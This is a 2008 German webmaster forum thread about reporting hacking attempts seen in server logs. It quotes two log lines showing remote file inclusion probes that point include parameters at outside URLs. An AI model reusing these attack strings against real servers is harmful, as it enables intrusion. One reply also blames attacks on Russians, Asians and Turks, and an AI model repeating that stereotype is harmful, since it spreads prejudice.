Hackerangriffe melden?

Beitrag von **Thmas35** » 03.06.2008, 19:38

Hallo, ich habe hiermal eine ganz unbedarfte Frage. Wenn ich in meine Server Log Files schaue und ich einen Eintrag für einen Hacker Angriff halte, wo kann ich diesen melden bzw. zur genaueren Analyse schicken?

Code: Alles auswählen

&#91;Tue Jun 03 15&#58;15&#58;02 2008&#93; &#91;error&#93; &#91;client 201.238.195.13&#93; PHP Warning&#58; parse_url&#40;/admin.php?include_path=http&#58;//www.wingsart.ru/gstbook/templates/liscence.txt?&#41;&#58; Unable to parse URL in /srv/www/vhosts/meinedomain.de/httpdocs/typo3conf/ext/realurl/class.tx_realurl.php on line 724

und hier nocheinmal von einer anderen Domain:

Code: Alles auswählen

&#91;Mon Jun 02 23&#58;42&#58;24 2008&#93; &#91;error&#93; &#91;client 64.202.117.159&#93; PHP Warning&#58; parse_url&#40;/includes/function.php?root_path=http&#58;//www.walmax.eu/upload/.help/test.txt?&#41;&#58; Unable to parse URL in /srv/www/vhosts/meinedomain.de/httpdocs/typo3conf/ext/realurl/class.tx_realurl.php on line 724

Hier versucht doch irgendwer ein File von mir zu parsen, wenn ich das richtig interpretiere.

von **Anzeige von ABAKUS** »

Beitrag von **emel** » 03.06.2008, 19:41

Hmm,

ich sehe sowas auch ziemlich oft. Besonders bei "eigenbauten". Finde es aber eher lustig wenn die leute denken die kommen mit ihren j**mla oder b*ard hack da rein.

So ist das leider im Internet. Gab mal so ne Statistik die besagt, dass ein rechner der "ungeschützt" ins netz geht im durchschnitt nach 24 minuten zum ersten mal von einem virus oder ähnlichem befallen wird/ist.

Beitrag von **Mr Omega** » 03.06.2008, 19:44

Das beste wird sein, Du gehst Deine Scripte durch und schaust nach Schwachstellen, gegen die meißten Hacker wirst Du machtlos sein, wenn Du diese verfolgen willst, die werden schon dafür gesorgt haben, dass eine Zurückverfolgung ausgeschlossen werden kann.

Mit sicheren Scripten fährst Du auf Dauer immer besser, obwohl ein wirklich Sicher wird es auch nicht zu 100 % geben.

Ansonsten, kannst Du natürlich ganz normal eine Anzeige gegen Unbekannt bei der Polizei stellen, aber die Aussichten auf Erfolg sind da eher gering.

Beitrag von **GreenHorn** » 03.06.2008, 19:52

...und mach je nach Dynamik des Portales turnusmäßig backups (zur Sicherheit auf wenigstens zwei getrennten Speichermedien),
mit dem im Ernstfall der Kasperkram überschrieben werden kann.

Beitrag von **ole1210** » 04.06.2008, 10:40

Schau dir mal an, woher die IPs kommen, die die "Angriffe" durchführen.

Das sind irgendwelche Script-Kiddies, die sich in einschlägigen Foren über die Sicherheitslücken informieren und drauflos "hacken".

Wenn du "Glück" hast kommen die aus "zivilisierten" Nationen wie Nordamerika, in der Regel sind das aber Russen, Asiaten, Türken, etc.

Kannst dich ja mal mit deinem Anwalt darüber unterhalten....der wird lachend vom Stuhl fallen..

Beitrag von **Thmas35** » 04.06.2008, 22:39

Das ist ja alles schön und gut, ich will aber nicht gleich zu den grünen rennen und den unbekannten anzeigen. Ich suche eher nach einer Möglichkeit, so wie bei einem auftretenen Virus, solche Angriffe zu melden. Das hätte den Vorteil, das die entsprechenden Webmaster, die ja "gehackt" (obwohl das ne Beledigung für einen Hacker wäre) wurden benachrichtigt werden, um ihre Schotten dicht zu machen.

Beitrag von **Airport1** » 04.06.2008, 23:54

Hierzu gibt es eigentlich die Moeglichkeit sich an

abuse@betreiberDiesesIPRanges

zu melden (die Range bzw. abuse-eMail-Adresse bekommst Du z.B. mit dnsstuff(.com?) heraus). je nachdem wer der Betreiber ist wird etwas unternommen (z.B. derjenige verwarnt oder sein Zugang abgeklemmt) oder leider auch haeufig geschieht nichts..